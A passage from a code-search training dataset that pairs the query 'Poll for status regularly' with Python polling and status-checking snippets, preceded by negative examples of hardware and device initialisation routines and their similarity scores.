self.r_motor = lazytalonsrx.LazyTalonSRX(Constants.IR_MOTOR_ID)\n self.l_motor.initialize(\n inverted=False, encoder=False, phase=False, name=\"Intake Left\")\n self.r_motor.initialize(\n inverted=True, encoder=False, phase=False, name=\"Intake Right\")", "def __init__(self):\n self.server_name = 'Binary Light Device'\n self.device = None", "def __init__(self):\r\n self.activation = Activation(u'signup')\r\n self.activated = False", "def __init__(self, *args):\n _snap.TUIntHI_swiginit(self, _snap.new_TUIntHI(*args))", "def __init__(self):\n try: \n self.i2c = busio.I2C(board.SCL, board.SDA)\n self.mpu = adafruit_mpu6050.MPU6050(self.i2c)\n \n except: \n print(\"No IMU connection\")", "def init_switches(inds):\n for i in inds:\n GPIO.setup(i, GPIO.OUT, initial=0)", "def __init__(self, bus: object):\r\n\r\n self.state_NF = False\r\n self.state_NT = False\r\n self.state_VE4_open = False\r\n self.state_VE4_close = False\r\n self.state_comand_open_VE4 = False\r\n self.state_comand_close_VE4 = False\r\n self.state_throttling = False\r\n self.state_heat = False\r\n self.state_rotation = False\r\n self.state_chmb_open = False\r\n self.back_door_close = False\r\n self.phase_electric = False\r\n self.turbine_break = False\r\n\r\n self.mes_current = 0\r\n self.mes_speed = 0\r\n self.mes_temperature = 0\r\n\r\n self.seted_throttling = 0\r\n self.seted_cur_heat = 0\r\n self.seted_rot_speed = 0\r\n\r\n self.bus = bus\r\n self.msg_send_upr = can.Message(\r\n arbitration_id=self.id_blockRasp_command,\r\n is_extended_id=True,\r\n dlc=4,\r\n data=bytearray(4),\r\n )", "def initialize(self):\n\t\tpcd8544.LCD.initialize(self)\n\t\tRPIO.setup(self._backlight_pin, RPIO.OUT, initial=RPIO.LOW)", "def __init__(self, aTimeout = None, aProlongFactor = None):\n if aTimeout is None:\n self.timeout = self.DEFAULT_TIMEOUT\n else:\n self.timeout = aTimeout\n if aProlongFactor is None:\n self.prolongFactor = self.DEFAULT_PROLONG\n else:\n self.prolongFactor = aProlongFactor\n\n #flags for inverted use of control pins\n #used for some hardware\n self.invertRST = 0\n self.invertTEST = 0\n self.swapRSTTEST = 0\n self.telosLatch = 0\n self.telosI2C = 0\n\n self.z1 = 0\n\n self.protocolMode = self.MODE_BSL\n self.BSLMemAccessWarning = 0 #Default: no warning.\n self.slowmode = 0", "def __init__(self, address=0x68, **kwargs):\n I2CDevice.__init__(self, address, **kwargs)\n logger.info(\"Created new si5324 instance with address 0x{:02X}.\".format(address))\n self.iCAL_required = True # An iCAL is required at least once before run", "def __init__(self,\n device_name,\n create_device_func,\n props,\n hub_name_prop,\n primary_port_prop,\n secondary_port_prop,\n ethernet_switch_prop,\n ethernet_port_prop,\n get_switchboard_if_initialized,\n power_and_data_share_cable=False,\n pre_off_func=None):\n super().__init__(device_name=device_name)\n\n self._create_device_func = create_device_func\n self._hub_name_prop = hub_name_prop\n self._primary_port_prop = primary_port_prop\n self._secondary_port_prop = secondary_port_prop\n self._props = props\n self._ethernet_switch = None\n\n # Set the properties\n self._get_switchboard_if_initialized = get_switchboard_if_initialized\n self._power_and_data_share_cable = power_and_data_share_cable\n self._pre_off_func = pre_off_func\n self._ethernet_switch_prop = ethernet_switch_prop\n self._ethernet_port_prop = ethernet_port_prop", "def __init__(self, parent, endpoint):\n Wemo_Endpoint.__init__(self, parent, endpoint)\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.FEATURES.update({\n FEATURE_BRIGHTNESS: False,\n FEATURE_PERCENT: False,\n FEATURE_NUMBER_OF_STEPS: False\n })", "def __init__(self, robot, switch_type):\n self.type = switch_type\n self.robot = robot\n self.lock = False\n self.last_lock_time = None\n self.graceful_state = False\n self._state = None", "def __init__(self, *args):\n _snap.TUIntH_swiginit(self, _snap.new_TUIntH(*args))", "def __init__(self):\n super().__init__()\n\n # Gadget state\n \n self.isDoorOpen = False\n self.verified = True\n\n # Ev3dev initialization\n self.leds = Leds()\n self.sound = Sound()\n self.drive = MoveTank(OUTPUT_B, OUTPUT_C)\n \n self.ir_sensor = InfraredSensor()\n self.ir_sensor.mode = self.ir_sensor.MODE_IR_REMOTE\n self.color_sensor = ColorSensor()\n self.color_sensor.mode = 'COL-COLOR' # WHITE\n\n # Start threads\n threading.Thread(target=self._patrol_thread, daemon=True).start()", "def __init__(self, **kwargs):\n self.session = None\n\n super(Password, self).__init__(**kwargs)\n\n if not self._mfa_supported():\n self._mfa_passcode = None", "def __init__(self, device):\n methods = ['on', 'off', 'toggle']\n if all(m in dir(device) for m in methods):\n self._impl = device\n else:\n raise TypeError(\"'device' must contain LED methods: \" +\n str(methods))", "async def initialize(self, hw_init=False, init_speed: str = \"200 sec / stroke\"):\n await self.pump_io.initialize()\n # Test connectivity by querying the pump's firmware version\n fw_cmd = Protocol1Command(command=\"U\", target_pump_num=self.address)\n self.metadata.version = await self.pump_io.write_and_read_reply_async(fw_cmd)\n logger.info(\n f\"Connected to Hamilton ML600 {self.name} - FW version: {self.metadata.version}!\"\n )\n\n if hw_init:\n await self.initialize_pump(speed=ureg.Quantity(init_speed))", "def __init__(self, hass):\n self.hass = hass\n self._volume = 0\n self._state = STATE_OFF", "def __init__(self, hass):\n self.hass = hass\n self._volume = 0\n self._state = STATE_OFF", "def initialize():\n dislin.disini()", "def __init__(self, *args):\n _snap.TUIntV_swiginit(self, _snap.new_TUIntV(*args))", "def __init__(self, spi, dc, rst, led):\n self._spi = spi\n self._spi.open()\n self._spi.set_mode(0)\n self._spi.set_clock_frequency(4000000)\n\n self._dc = dc\n self._rst = rst\n self._led = led\n self._enabled = False", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n self._attr_name = f\"{self.device.display_name} {self.entity_description.name}\"\n self._switch_type = self.entity_description.key", "async def async_setup_entry(\n hass: HomeAssistantType, entry: ConfigEntry, async_add_entities\n) -> None:\n entry_data = hass.data[DOMAIN][entry.entry_id]\n upv_object = entry_data[\"upv\"]\n protect_data = entry_data[\"protect_data\"]\n server_info = entry_data[\"server_info\"]\n\n if not protect_data.data:\n return\n\n ir_on = entry.data[CONF_IR_ON]\n if ir_on == \"always_on\":\n ir_on = \"on\"\n\n ir_off = entry.data[CONF_IR_OFF]\n if ir_off == \"led_off\":\n ir_off = \"autoFilterOnly\"\n elif ir_off == \"always_off\":\n ir_off = \"off\"\n\n switches = []\n for switch, switch_type in SWITCH_TYPES.items():\n required_field = switch_type[_SWITCH_REQUIRES]\n for camera_id in protect_data.data:\n # Only Add Switches if Camera supports it.\n if required_field and not protect_data.data[camera_id].get(required_field):\n continue\n\n switches.append(\n UnifiProtectSwitch(\n upv_object,\n protect_data,\n server_info,\n camera_id,\n switch,\n ir_on,\n ir_off,\n )\n )\n _LOGGER.debug(\"UNIFIPROTECT SWITCH CREATED: %s\", switch)\n\n async_add_entities(switches)", "def __init__(self, communication, dev_selector):\n super().__init__(communication, dev_selector,\n self.ADDR_MODE_8,\n self.TRANSFER_MSB_FIRST)\n self.init()", "def __init__(self, *args):\n _snap.TUInt_swiginit(self, _snap.new_TUInt(*args))", "def __init__(self, username, password, deviceid):\n self.deviceid = int(deviceid)\n self.session = requests.Session()\n\n self.auth_requestparm = {\n 'timeOffset': 240,\n 'RememberMe': 'false',\n 'UserName': username,\n 'Password': password,\n }\n\n self.query_headers[\"Referer\"] = self.BASEURL + \"/Device/Control/\" + str(deviceid)\n self.change_request[\"DeviceID\"] = int(deviceid)\n self.status = \"\"", "def __init__(self,address,InUseBy=None,Bus = None,Ident=''):\n self.Ident = Ident\n self.InUseBy = InUseBy\n VersionStrip =Ident.split(' ')[0].lower()\n if Ident !='' and VersionStrip in I2C.DeviceList:\n self.InUseBy = I2C.DeviceList[VersionStrip](Bus,address)\n else:\n self.Type=None\n if self.InUseBy!=None:\n self.InUseBy.Ident=VersionStrip", "def _init_io(self):\n GPIO.setwarnings(False)\n GPIO.setmode( GPIO.BCM )\n pins = [ self._spi_dc ]\n for pin in pins:\n GPIO.setup( pin, GPIO.OUT )", "def __init__(self):\n super().__init__()\n\n # Robot state\n self.ask_mode = False\n\n # Connect two large motors on output ports B and C\n self.sound = Sound()\n self.leds = Leds()\n self.p1 = TouchSensor(INPUT_1)\n self.p2 = TouchSensor(INPUT_2)\n self.p3 = TouchSensor(INPUT_3)\n self.p4 = TouchSensor(INPUT_4)", "def __init__(self, device):\n self._unique_id = device\n self._device = AehW4a1(device)\n self._fan_modes = FAN_MODES\n self._swing_modes = SWING_MODES\n self._preset_modes = PRESET_MODES\n self._attr_available = False\n self._on = None\n self._current_temperature = None\n self._target_temperature = None\n self._attr_hvac_mode = None\n self._fan_mode = None\n self._swing_mode = None\n self._preset_mode = None\n self._previous_state = None", "def __init__(\n self,\n data: ProtectData,\n device: ProtectAdoptableDeviceModel,\n description: ProtectSwitchEntityDescription,\n ) -> None:\n super().__init__(data, device, description)\n\n if self.device.is_privacy_on:\n extra_state = self.extra_state_attributes or {}\n self._previous_mic_level = extra_state.get(ATTR_PREV_MIC, 100)\n self._previous_record_mode = extra_state.get(\n ATTR_PREV_RECORD, RecordingMode.ALWAYS\n )\n else:\n self._previous_mic_level = self.device.mic_volume\n self._previous_record_mode = self.device.recording_settings.mode", "def GPIO_initialization():\n GPIO.setmode(GPIO.BCM)\n\n GPIO.setup(Sensor.IN_1, GPIO.OUT)\n GPIO.setup(Sensor.IN_2, GPIO.OUT)\n GPIO.setup(Sensor.EN, GPIO.OUT)\n\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['RED_STOP'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['YELLOW_CW'], GPIO.IN)\n GPIO.setup(Membrane_Switch.PSEUDO_MEMBRANE_SWITCH['GREEN_CCW'], GPIO.IN)\n\n GPIO.output(Sensor.IN_1, GPIO.LOW)\n GPIO.output(Sensor.IN_2, GPIO.LOW)", "def __init__(self):\r\n global modrive\r\n self.state = DisconnectedState() # default is disarmed\r\n self.encoder_time = 0", "def __init__(\n self,\n netatmo_device: NetatmoDevice,\n ) -> None:\n super().__init__(netatmo_device.data_handler)\n\n self._switch = cast(NaModules.Switch, netatmo_device.device)\n\n self._id = self._switch.entity_id\n self._attr_name = self._device_name = self._switch.name\n self._model = self._switch.device_type\n self._config_url = CONF_URL_CONTROL\n\n self._home_id = self._switch.home.entity_id\n\n self._signal_name = f\"{HOME}-{self._home_id}\"\n self._publishers.extend(\n [\n {\n \"name\": HOME,\n \"home_id\": self._home_id,\n SIGNAL_NAME: self._signal_name,\n },\n ]\n )\n self._attr_unique_id = f\"{self._id}-{self._model}\"\n self._attr_is_on = self._switch.on", "def __init__(self):\r\n\t\tself.introducer()\r\n\t\tif self.code_mode == \"1\":\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.encrypt_message()\r\n\t\t\telse:\r\n\t\t\t\tself.encrypt_text_file()\r\n\t\t\t\t#print(\"work in progress\")\r\n\t\telif self.code_mode == \"2\":\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.decrypt_message()\r\n\t\t\telse:\r\n\t\t\t\tself.decrypt_text_file()\r\n\t\telse:\r\n\t\t\tif self.input_mode == \"1\":\r\n\t\t\t\tself.hack_message()\r\n\t\t\telse:\r\n\t\t\t\tself.hack_text_file()", "def __init__(self, firmware_package=None, verbose=False):\n\n # Set up the OV device to handle packets.\n super().__init__(verbose=verbose)\n\n # If we weren't handed a firmware package, look for the default.\n if firmware_package is None:\n package_file = find_openvizsla_asset(self.DEFAULT_FIRMWARE_PACKAGE_NAME)\n firmware_package = OVFirmwarePackage(package_file)\n \n self.verbose = verbose\n self.firmware = firmware_package\n\n # Default to being unopened, and assume an unprogrammed FPGA.\n self._is_open = False\n self._fpga_loaded = False\n\n # Create the FTDI connection to our OV device.\n self.ftdi = FTDIDevice()\n\n # Set up \"memory windows\" that allow us to access the OV device's I/O and \n mmio_map = firmware_package.get_register_map()\n self.regs = OVMemoryWindow(mmio_map, self.read_io_byte, self.write_io_byte)\n self.ulpi_regs = USB334xMemoryWindow(self.read_ulpi_register, self.write_ulpi_register)\n\n # Start off with an unvalidated ULPI clock.\n self.ulpi_clock_validated = False\n\n # Build our local packet handlers.\n self._set_up_io_handlers()", "def init_VI():\n\n\tprint 'Setting VI'\n\tvi = UsbVehicleInterface(payload_format=\"json\")\n\n\treturn vi", "def __init__(self):\n # Initialize key variables\n self.reserved = '_SYSTEM_RESERVED_'\n self.config = configuration.Config()", "def __init__(self, port=\"AD1\", use_mutex=False):\n self.use_mutex = use_mutex\n\n try:\n bus = ports[port]\n except KeyError:\n bus = \"RPI_1SW\"\n\n ifMutexAcquire(self.use_mutex)\n try:\n # print(\"INSTANTIATING ON PORT {} OR BUS {} WITH MUTEX {}\".format(port, bus, use_mutex))\n super(self.__class__, self).__init__(bus = bus)\n # on GPG3 we ask that the IMU be at the back of the robot, facing outward\n # We do not support the IMU on GPG2 but leaving the if statement in case\n if bus != \"RPI_1SW\":\n self.BNO055.set_axis_remap( BNO055.AXIS_REMAP_X,\n BNO055.AXIS_REMAP_Z,\n BNO055.AXIS_REMAP_Y,\n BNO055.AXIS_REMAP_POSITIVE,\n BNO055.AXIS_REMAP_NEGATIVE,\n BNO055.AXIS_REMAP_POSITIVE)\n except Exception as e:\n print(\"Initiating error: \"+str(e))\n raise\n finally:\n sleep(0.1) # add a delay to let the IMU stabilize before control panel can pull from it\n ifMutexRelease(self.use_mutex)", "def __init__(__self__, *,\n algorithm: str,\n protection_level: str):\n pulumi.set(__self__, \"algorithm\", algorithm)\n pulumi.set(__self__, \"protection_level\", protection_level)", "def __init__(self, *args):\n _snap.TUndirNet_swiginit(self, _snap.new_TUndirNet(*args))", "def __init__(self, *args):\n _snap.TFltUIntKd_swiginit(self, _snap.new_TFltUIntKd(*args))", "def init_led():\r\n global led\r\n led = LED(LED_GPIO_PIN)\r\n led.off()", "def __init__(self, uid):\n Device.__init__(self, uid)\n\n self.expected_name = 'Analog Out Bricklet'\n\n self.binding_version = [1, 0, 0]", "def init(self, mode: int, pull: int = -1, *,\n value: Optional[int] = None, alt: Optional[int] = None) -> None:\n ...", "def __init__(self, verbose=False, monitor=False):\n # Superclass call\n SwapInterface.__init__(self, None, verbose) \n # Print SWAP activity\n self._printSWAP = monitor\n # Mote address in SYNC mode\n self._addrInSyncMode = None", "def teleopInit(self):\n self.myRobot.setSafetyEnabled(True)", "def __init__(__self__, *,\n bit_locker_key: str,\n disk_serial_number: str):\n pulumi.set(__self__, \"bit_locker_key\", bit_locker_key)\n pulumi.set(__self__, \"disk_serial_number\", disk_serial_number)", "def __init__(self, *args):\n _snap.TUIntUIntPr_swiginit(self, _snap.new_TUIntUIntPr(*args))", "def __init__(self):\n\n super().__init__()\n\n self.active = True\n self.driver = Driver.instance()\n self.sensor_manager = SensorManager.instance()\n\n self.pwm = Adafruit_PCA9685.PCA9685(address=0x40, busnum=1) # create PCA9685-object at I2C-port\n self.pwm.set_pwm_freq(50)\n\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(20, GPIO.OUT)\n GPIO.setup(21, GPIO.OUT)\n GPIO.setup(26, GPIO.OUT)\n self.driven_distance = 0", "def __init__(self,\r\n enabled=None,\r\n spare_serial=None,\r\n uplink_mode=None,\r\n virtual_ip_1=None,\r\n virtual_ip_2=None):\r\n\r\n # Initialize members of the class\r\n self.enabled = enabled\r\n self.spare_serial = spare_serial\r\n self.uplink_mode = uplink_mode\r\n self.virtual_ip_1 = virtual_ip_1\r\n self.virtual_ip_2 = virtual_ip_2", "def __init__(self):\n _hypre.HypreIdentity_swiginit(self, _hypre.new_HypreIdentity())", "def __init__(self, device_mode, loop):\n self.loop = loop\n self.device_mode = device_mode\n if self.device_mode == \"stationary\":\n self.openface = OpenFaceInstance()\n self.openface.startProcess()\n self.stationary_eye_tracker = StationaryEyeTracker()\n elif self.device_mode == \"mobile\":\n self.openpose = OpenPoseInstance()\n self.openpose.startProcess()\n self.mobile_eye_tracker = MobileEyeTracker()\n self.mobile_eye_tracker.calibrate()\n\n self.wristband = Wristband(self.loop)", "def __init__(self, ledSet):\n\n self.ledSet = ledSet\n self.resetBlock()\n self.currentPower = None", "def Initialise(self):\n self.__m_Platform.Initialise()\n self.__m_Pump.Initialise( False )", "def __init__(self):\n self._read_calibration_data()\n self.configure_sensor(\n TemperatureOversamplings.x08,\n PressureOversamplings.x16,\n HumidityOversamplings.x08,\n IIRFilterCoefficients.FC_003,\n 250,\n 250)", "def __init__(self, parent, endpoint):\n self._Parent = parent\n self.endpoint = endpoint\n self.device_type = self._Parent._DeviceTypes.get('wemo_switch')\n self.device_commands = parent._Devices.device_commands\n self.yombo_device = None\n self.state = self.endpoint.get_state()\n self.commands = {}\n self.last_request_id = None\n self.device_mfg = \"wemo\"\n self.FEATURES: dict = {}", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_i2c'] = True", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_i2c'] = True", "def __init__(self, hdw=['Soundcard'], devicename='dev1'):\n self.debugFlag = False\n self.task = None # NI Task\n self.required_hardware = hdw # Require specific hardware \n self.hardware = [] # list of hardware actually found on this system\n self.find_hardware(device_info={'devicename': devicename}) # population the self.hardware list", "def __init__(\n self,\n avm_wrapper: AvmWrapper,\n device_friendly_name: str,\n switch_info: SwitchInfo,\n ) -> None:\n super().__init__(avm_wrapper, device_friendly_name)\n\n self._description = switch_info[\"description\"]\n self._friendly_name = switch_info[\"friendly_name\"]\n self._icon = switch_info[\"icon\"]\n self._type = switch_info[\"type\"]\n self._update = switch_info[\"callback_update\"]\n self._switch = switch_info[\"callback_switch\"]\n\n self._name = f\"{self._friendly_name} {self._description}\"\n self._unique_id = f\"{self._avm_wrapper.unique_id}-{slugify(self._description)}\"\n\n self._attributes: dict[str, str] = {}\n self._is_available = True", "def _initialize_hardware(self):\n # Import\n try:\n import board\n import busio\n import adafruit_vl6180x\n except Exception as ex:\n logging.error(\n '\\n *** ERROR importing Adafruit libraries: {}'.format(\n ex,\n ),\n )\n\n # Things failed, so we must be running locally, not on a widget;\n # don't bother hooking up the VL6180X\n return\n\n # Initialize I2C and VL6180X\n try:\n i2c = busio.I2C(board.SCL, board.SDA)\n self._sensor = adafruit_vl6180x.VL6180X(i2c)\n except Exception as ex:\n logging.error(\n '\\n *** ERROR initializing I2C/LSM303: {}'.format(ex),\n )\n\n self._initialize_id_led()", "def __init__(self):\r\n\r\n super(Bypass, self).__init__()\r\n\r\n # Initialize public scalar attributes.\r\n self.specification = 0 # MIL-C-25 or MIL-C-12889.\r\n self.spec_sheet = 0 #\r\n if self.hazard_rate_type < 3: # MIL-HDBK-217\r\n self.reference_temperature = 358.0\r\n\r\n# def set_attributes(self, values):\r\n \"\"\"\r\n Method to set the Capacitor data model attributes.\r\n\r\n :param tuple values: tuple of values to assign to the instance\r\n attributes.\r\n :return: (_code, _msg); the error code and error message.\r\n :rtype: tuple\r\n \"\"\"", "def init(self):\n self.IP_ADDRESS = \"192.168.16.55\"\n self.PORT = 8888\n self.windFreakConnection = windFreakClient.ConnectionConstantFrequency(IP_ADDRESS=self.IP_ADDRESS, port=self.PORT) \n self.initialised=True\n return \"%s init successful\" % self.hardwareActionName", "def __init__(self):\n self.if0 = None\n self.if1 = None", "def __init__(self):\n self.if0 = None\n self.if1 = None", "def __init__(self, *args):\n _snap.TUndirNetNodeI_swiginit(self, _snap.new_TUndirNetNodeI(*args))", "def __init__(self):\n super().__init__(interface.RemoteControl, DEFAULT_PRIORITIES)", "def _use_existing_configuration(self):\n HW_Init(self.ftdi, None)", "def __init__(__self__, *,\n enabled: Optional[pulumi.Input[bool]] = None,\n version: Optional[pulumi.Input[str]] = None):\n if enabled is not None:\n pulumi.set(__self__, \"enabled\", enabled)\n if version is not None:\n pulumi.set(__self__, \"version\", version)" ]
[ "0.668283", "0.6222391", "0.6021048", "0.592539", "0.57956624", "0.5783978", "0.5776359", "0.5716881", "0.5700141", "0.56954783", "0.5673299", "0.5581777", "0.55620766", "0.55259913", "0.5523816", "0.5519903", "0.5512638", "0.55101365", "0.5487694", "0.5478698", "0.5470831", "0.5470184", "0.5468139", "0.54515016", "0.5416385", "0.5405412", "0.539717", "0.53865606", "0.53601694", "0.5348798", "0.53384244", "0.533447", "0.53272384", "0.5321442", "0.5320724", "0.53125286", "0.5311459", "0.5311392", "0.5301872", "0.5297271", "0.52922845", "0.5281517", "0.5274659", "0.52712303", "0.52597964", "0.52489656", "0.5239923", "0.5239923", "0.5239008", "0.52217937", "0.52197635", "0.52192956", "0.521752", "0.5217014", "0.52097213", "0.5199177", "0.5192679", "0.5191767", "0.5186588", "0.5185998", "0.51824737", "0.51772666", "0.5172271", "0.5171375", "0.51675385", "0.51647663", "0.5149305", "0.5140282", "0.5140026", "0.51226175", "0.5110875", "0.51026803", "0.5100077", "0.5099554", "0.5096497", "0.5092766", "0.5083534", "0.5082922", "0.50810903", "0.5079734", "0.5075286", "0.50749296", "0.5070515", "0.5062264", "0.50614285", "0.505453", "0.5044989", "0.5044726", "0.5044726", "0.5041321", "0.50360453", "0.5034403", "0.503417", "0.5028542", "0.50262135", "0.50262135", "0.50259113", "0.50250846", "0.5024875", "0.5022616" ]
0.708648
0
Poll for status regularly.
def should_poll(self): return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def poll(self):\n self.poll_function(self.connection)", "def wait_for_status(self, status):\n code = self.instance.state['Code']\n while code != status:\n time.sleep(3)\n self.instance.reload()\n code = self.instance.state['Code']", "def refresh_status() -> None:\n ...", "def poll(self):\n while self.running and reactor._started and not reactor._stopped:\n self.check_response_queue()\n sleep(0.5)", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def should_poll(self):\n return True", "def _StatusUpdateThreadMain(self):\n while self._status_update_active:\n self._UpdateStatus()\n time.sleep(self._status_update_interval)", "def periodic_timer(self):\n while self.running:\n self.sendStatusQuery()\n time.sleep(REPORT_INTERVAL)", "def poll_for_active_status(self, server_id, req_status=\"ACTIVE\"):\n status = \"BUILDING\"\n iteration = 30\n while status.upper() != req_status.upper() \\\n or status.upper() != \"ERROR\":\n server_info = self.show_server(server_id)\n if not isinstance(server_info, dict):\n return\n status = server_info['status']\n LOG_OBJ.debug(\"Server status : %s\" % status)\n if status.upper() in [req_status.upper(), 'ERROR']:\n break\n LOG_OBJ.debug(\"Waiting till server goes to %s state...\"\n % req_status)\n time.sleep(20)\n iteration -= 1\n if not iteration:\n err_msg = \"The server:%s is NOT in %s state\" \\\n \"within 10 minutes\" % (server_id, status)\n LOG_OBJ.error(err_msg)\n return \"POLL_TIME_EXCEEDED\"\n\n LOG_OBJ.debug(\"Server becomes %s\" % status)\n\n return status", "def poll(self):\n return False", "def setup_poll(self):\n while True:\n try:\n self.do_polling()\n time.sleep(0.01)\n except KeyboardInterrupt:\n print(self.get_stream())\n exit()", "async def status_update_loop(self):\n self.status_message_update_waiter = sleep(UPDATE_INTERVAL, KOKORO)\n \n while self.state == CHANNEL_MOVE_STATE_NONE:\n set_value = await self.status_message_update_waiter\n # sleep sets by `None`\n if set_value is not None:\n break\n \n self.status_message_update_waiter = sleep(UPDATE_INTERVAL, KOKORO)\n await self.update_status_message()\n continue\n \n await self.update_status_message()\n await self.send_done_notification()\n return", "def refresh_status(self):\n\n pass", "def should_poll(self):\r\n return False", "def long_poll(self):\n now = time.time()\n self.l_debug(\"long_poll\",\"now=%d\" % (now))\n self._set_st(now)\n self.report_isycmd('DON')\n return", "def poll(self):\n raise NotImplementedError()", "def _poll(self):\n return self.zmq_core.poll(10)", "async def _watch_status(self, job_id, job_paths):\n status_path = job_paths['status.json']\n\n watcher = aionotify.Watcher()\n watcher.watch(status_path, aionotify.Flags.CLOSE_WRITE)\n await watcher.setup(self.loop)\n try:\n while True:\n try:\n await self._read_status(job_id, job_paths)\n await watcher.get_event()\n self.logger.debug(f'Detected status change for job {job_id}')\n except concurrent.futures.CancelledError:\n # Break loop (likely normal exit through task cancellation)\n break\n except Exception: # pylint: disable=broad-except\n self.logger.exception(f'Exception while watching status of job {job_id}')\n finally:\n watcher.unwatch(status_path)\n watcher.close()", "def status(self) -> NoReturn:\n\n curr_status= self.percent_done()\n while(curr_status < 100):\n\n update_status(name=self.name, status=curr_status)\n time.sleep(0.5)\n\n curr_status = self.percent_done()\n\n update_status(name=self.name, status=curr_status)", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def should_poll(self) -> bool:\n return True", "def check_completion(self):\n\n time.sleep(3)\n while self.status == 0:\n pass", "def wait_for_object_status(self, object_name, object_id, status,\n timeout=120, interval=3):\n cmd = self.object_cmd(object_name, 'show')\n start_time = time.time()\n while time.time() - start_time < timeout:\n if status in self.cinder(cmd, params=object_id):\n break\n time.sleep(interval)\n else:\n self.fail(\"%s %s did not reach status %s after %d seconds.\"\n % (object_name, object_id, status, timeout))", "def poll(self):\n if self._server:\n self._server.poll()", "async def run(self):\n while True:\n await asyncio.sleep(0)\n # See if any sockets have anything\n try:\n socks, events = self.poller.poll(1000)\n for sock, event in zip(socks,events):\n if sock in self.subscriptions:\n states = sock.recv_json()\n await self.main_server.sync_states(states)\n\n # Nothing to report - Poller did not find any sockets with updates\n except ValueError:\n pass\n # Exiting\n except KeyboardInterrupt:\n break", "async def _check_status(\n self, update: Update, context: ContextTypes.DEFAULT_TYPE\n ) -> None:\n self.system_status_lock.acquire()\n info = self.system_status_proxy._getvalue()\n self.system_status_lock.release()\n await update.message.reply_markdown(\"*System Status*\")\n for key in info:\n await update.message.reply_text(f\"{key}: {info[key]}\")", "async def check_status(self):\n while True:\n async with self._loop_lock:\n new_monitor_processes = {}\n for class_name in self.monitor_processes:\n monitor = self.monitor_processes[class_name][\"process\"]\n if monitor.poll() is not None:\n log = f\"Monitor {class_name} has stopped with code: {monitor.returncode}\"\n if monitor.returncode:\n self.general_logger.warning(log)\n if self.config[\"WebhookConfig\"][\"crash_webhook\"]:\n embed = get_mm_crash_embed(\n \"Monitor \" + class_name,\n monitor.returncode,\n monitor.pid,\n )\n ts = datetime.now().strftime(\n self.config[\"WebhookConfig\"][\"timestamp_format\"]\n )\n\n embed.set_footer(\n text=f\"{self.config['WebhookConfig']['provider']} | {ts}\",\n icon_url=self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n )\n data = json.dumps(\n {\n \"embeds\": [embed.to_dict()],\n \"username\": \"MonitorManager process watcher\",\n \"avatar_url\": self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n }\n )\n r = await self.client.fetch(\n self.config[\"WebhookConfig\"][\"crash_webhook\"],\n method=\"POST\",\n body=data,\n headers={\"content-type\": \"application/json\"},\n raise_error=False,\n )\n else:\n self.general_logger.info(log)\n else:\n new_monitor_processes[class_name] = self.monitor_processes[\n class_name\n ]\n self.monitor_processes = new_monitor_processes\n\n new_scraper_processes = {}\n for class_name in self.scraper_processes:\n scraper = self.scraper_processes[class_name][\"process\"]\n if scraper.poll() is not None:\n log = f\"Scraper {class_name} has stopped with code: {scraper.returncode}\"\n if scraper.returncode:\n self.general_logger.warning(log)\n if self.config[\"WebhookConfig\"][\"crash_webhook\"]:\n embed = get_mm_crash_embed(\n \"Scraper \" + class_name,\n scraper.returncode,\n scraper.pid,\n )\n ts = datetime.now().strftime(\n self.config[\"WebhookConfig\"][\"timestamp_format\"]\n )\n\n embed.set_footer(\n text=f\"{self.config['WebhookConfig']['provider']} | {ts}\",\n icon_url=self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n )\n data = json.dumps(\n {\n \"embeds\": [embed.to_dict()],\n \"username\": \"MonitorManager process watcher\",\n \"avatar_url\": self.config[\"WebhookConfig\"][\n \"provider_icon\"\n ],\n }\n )\n r = await self.client.fetch(\n self.config[\"WebhookConfig\"][\"crash_webhook\"],\n method=\"POST\",\n body=data,\n headers={\"content-type\": \"application/json\"},\n raise_error=False,\n )\n else:\n self.general_logger.info(log)\n else:\n new_scraper_processes[class_name] = self.scraper_processes[\n class_name\n ]\n self.scraper_processes = new_scraper_processes\n await asyncio.sleep(1)", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def should_poll(self) -> bool:\n return False", "def poll(self, poll_input):", "def poll_thread():\n while not stop_flag.wait(0.100): # poll every 100ms\n check_jobs()", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "async def check_connection_status(self):\n while True:\n if not self.connected:\n self.log.error(\"Lost connection to spa, attempting reconnect.\")\n await self.connect()\n await asyncio.sleep(10)\n continue\n if (self.lastupd + 5 * self.sleep_time) < time.time():\n self.log.error(\"Spa stopped responding, requesting panel config.\")\n await self.send_panel_req(0, 1)\n await asyncio.sleep(self.sleep_time)", "def wait_for_update(self):\n while \"updating_db\" in self.status():\n time.sleep(1)", "def monitor(self, target):\n while self.RUNNING:\n check_time = datetime.now()\n next_check = check_time + timedelta(seconds=target[\"frequency\"])\n\n try:\n self.produce(\n get(target[\"url\"], timeout=target[\"frequency\"] - 0.5),\n target.get(\"regex\"),\n check_time,\n )\n except Timeout:\n self.logger.warning(\"Check for %s timed out\", 